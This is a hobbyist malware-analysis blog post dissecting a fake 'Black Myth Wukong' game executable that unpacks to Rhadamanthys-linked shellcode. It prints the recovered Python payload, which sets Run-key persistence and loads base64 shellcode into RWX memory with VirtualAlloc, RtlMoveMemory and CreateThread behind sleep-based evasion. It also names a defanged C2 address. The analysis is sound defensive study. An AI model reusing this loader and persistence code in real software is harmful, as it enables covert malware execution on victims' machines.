Forensic at @World Wide Flags
Operator at @Cookie Han Hoan
Malware Analysis - Real Case 8
Hi guy, I’ve just had a very bad thing today… I don’t wanna say it again because it’s kinda vulnerable for me… By the way, I analysed a sample which existed a long time ago to forget all sad stories today. Ok let’s go… (you can take sample here)
First words, this is the malware that infected Mixi machine and this post is just for education, I will not take any responsibilities for your illegal actions!
Now go to the main part, I downloaded it and it’s a .rar file, so just unrar it and get the full files inside:
We can see that Black Myth Wukong 64-bit.exe will be the main point for this malware, now let’s analyse it. I used diec to detect packed method and it was packed by Pyinstaller:
From here we can use pyinstxtractor-ng to dump all components inside the exe file:
You can see that BSR.pyc is the most suspicious file here, and to decompile pyc file we will use uncompyle6 or pycdc. But when I tried it’s not worked even though I used pyinstxtractor-ng which is the best tool till now:
From here I guessed that there is something that I need to check, hmmmm kinda interesting huh? Normally these tools we are using may have some problems and in this case my tool decompile incompletely because this tool can just dump file that has the permitted size. From here I guessed that they used PE Bloat technique which is used to add junk bytes to the end of file so that the file size will be increased and AV cannot scan also our tools. The easiest to check is using xxd and look at the end of the file and as my expectation, there are so many junk bytes at the end of the file:
There is a tool to help u remove all junk bytes inside the exe file. I used it and surprisingly the sample was reduced from 660 MB to 6.61 MB!:
Now do all the thing we did before with reduced file but I still could not decompile fully BSR.pyc. From here there is just one way is: read its assembly… But I don’t have emotion to do anything here so I will use AI to write the function for me,… and this is the final result:
import ctypes
import time
import winreg
import sys
import os
import subprocess
import base64
# Put very long string here
with open("C:\\Users\\Admin\\Documents\\Code\\Python\\payload.txt", "r") as Data:
payload = Data.read()
def B(bits, encoding):
n = int(bits, 2)
byte_length = (n.bit_length() + 7) // 8
byte_data = n.to_bytes(byte_length, 'big')
decoded_data = byte_data.decode(encoding)
return decoded_data
modified_data = payload.replace('TTT', '0')
final_result = B(modified_data, 'utf-8')
with open("payload.py", 'a') as file:
file.write(final_result)
Run it and you will get another payload:
def Checker():
REG_PATH = "Software\\Microsoft\\Windows\\CurrentVersion\\Run"
try:
registry_key = winreg.OpenKey(winreg.HKEY_CURRENT_USER, REG_PATH, 0, winreg.KEY_READ)
value, regtype = winreg.QueryValueEx(registry_key, "Steam_")
winreg.CloseKey(registry_key)
return True
#return value
except WindowsError:
return False
#return None
def P():
Final_Location = os.path.dirname(sys.argv[0]).replace("/", "\\") + "\\" + os.path.basename(sys.argv[0])
try:
subprocess.call('reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v {} /t REG_SZ /d "'.format("Steam_") + Final_Location + '"', shell=True)
except:
pass
def main():
try:
ELES = ctypes.windll.kernel32
ELES.VirtualAlloc.argtypes = (CHead.LPVOID, ctypes.c_size_t, CHead.DWORD, CHead.DWORD)
ELES.VirtualAlloc.restype = CHead.LPVOID
time.sleep(69)
time.sleep(13)
ELES.CreateRemoteThread.argtypes = (CHead.HANDLE, CHead.LPVOID, ctypes.c_size_t, CHead.LPVOID, CHead.LPVOID, CHead.DWORD, CHead.LPVOID)
ELES.CreateThread.restype = CHead.HANDLE
time.sleep(13)
ELES.RtlMoveMemory.argtypes = (CHead.LPVOID, CHead.LPVOID, ctypes.c_size_t)
ELES.RtlMoveMemory.restype = CHead.LPVOID
time.sleep(13)
ELES.WaitForSingleObject.argtypes = (CHead.HANDLE, CHead.DWORD)
ELES.WaitForSingleObject.restype = CHead.DWORD
#memoryaddr = kernel32.VirtualAlloc(None, len(buf), 0x3000, 0x40)
time.sleep(69)
MAS = ELES.VirtualAlloc(None, len(base64.b64decode(SHSH.encode())), 0x3000, 0x40)
time.sleep(13)
# kernel32.RtlMoveMemory(memoryaddr, buf, len(buf))
ELES.RtlMoveMemory(MAS, base64.b64decode(SHSH.encode()),len(base64.b64decode(SHSH.encode())))
time.sleep(47)
thrd2 = ELES.CreateThread(ctypes.c_int(0), ctypes.c_int(0), ctypes.c_void_p(MAS), ctypes.c_int(0),ctypes.c_int(0), ctypes.pointer(ctypes.c_int(0)))
time.sleep(69)
ELES.WaitForSingleObject(thrd2, -1)
except Exception as error:
pass
if __name__ == "__main__":
#P()
#f=open("Base64DInvokePAMSI_ETW_ShellCode.txt","w")
#f.write(base64.b64encode(buf).decode())
time.sleep(27)
#if(not Checker()):
#P()
#print("Done")
time.sleep(13)
time.sleep(13)
main()
They are main functions for the payload. The script manipulates the Windows registry to set itself to run automatically at startup by adding an entry to the HKCU\Software\Microsoft\Windows\CurrentVersion\Run registry key. It then uses ctypes to call Windows API functions, allocating memory, copying base64-decoded shellcode into that memory, and executing it in a new thread. The script incorporates delays to avoid detection and evasion mechanisms, allowing it to execute malicious payloads in memory without writing them to disk. From here I will take base64 string, decode it and get the shellcode:
Check shellcode and it’s a PE32 file:
From here I use any.run to run this shellcode and I got some results:
The shellcode tried to connect to an IP address: 94[.]156[.]8[.]129 and when searched it in Virustotal, it was noted as the C2 address for Rhadamanthys malware. Moreover, we can see that dialer.exe was marked as malicious while it’s in System32? From here I guessed that shellcode would inject to dialer.exe process and from this process attacker can do some evil things.
Ok so this is the end now. I can just analyse till here because of limited knowledge. It’s time for me to find some peaceful place for healing, I had so many bad things this morning. Thank you everyone for loving me, giving me chance to display myself. Finally, I love you so much…